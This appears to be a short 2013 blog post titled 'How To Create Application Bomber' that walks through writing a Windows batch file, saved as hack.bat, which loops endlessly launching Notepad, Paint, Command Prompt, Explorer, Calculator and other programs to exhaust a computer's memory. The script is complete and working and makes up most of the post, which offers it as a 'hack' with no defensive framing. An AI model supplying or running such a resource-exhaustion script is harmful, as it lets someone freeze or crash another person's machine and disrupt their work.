Friday, 22 February 2013

How To Create Application Bomber


How To Create Application Bomber

How To Create Application Bomber

Application Bomber is an application where all the applications will be executed simultaneously , which eats the memory of an processor.Follow this tutorial to create anApplication Bomber.


1. Start -> Run .
2. In Run type notepad.
3. In notepad type the following which is shown below.
@echo off
:loop
start notepad
start compmgmt.msc
start mspaint
start osk
start cmd
start explorer
start control
start calc
goto loop

4. Now save the notepad with .bat extension.(hack.bat)

No comments:

Post a Comment